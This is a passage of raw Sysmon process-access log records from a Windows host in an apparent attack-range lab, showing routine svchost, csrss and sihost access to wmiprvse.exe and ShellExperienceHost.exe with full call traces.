13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+47ca8|C:\Windows\System32\modernexecserver.dll+47c41|C:\Windows\System32\modernexecserver.dll+19c8a|C:\Windows\System32\modernexecserver.dll+1f6f8|C:\Windows\SYSTEM32\twinapi.appcore.dll+32a67|C:\Windows\SYSTEM32\twinapi.appcore.dll+32870|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SY